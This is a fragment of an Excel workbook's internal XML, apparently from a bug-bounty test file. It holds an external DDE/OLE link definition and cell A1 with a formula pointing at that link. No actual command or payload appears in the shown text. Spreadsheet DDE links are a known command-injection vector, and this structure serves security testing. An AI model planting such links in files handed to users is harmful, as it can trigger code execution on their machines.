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My PC (bugbounty)\Downloads\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="11865" windowHeight="44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calc">
    <ddeItems>
      <ddeItem name="StdDocumentName" ole="1" advise="1"/>
      <ddeItem name="xxx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O13" sqref="O13"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="28.5703125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1" s="1" t="e">
        <f>[1]!xxx</f>
        <v>#REF!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2024-08-20T10:09:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-20T10:09:19Z</dcterms:modified>
</cp:coreProperties>
</file>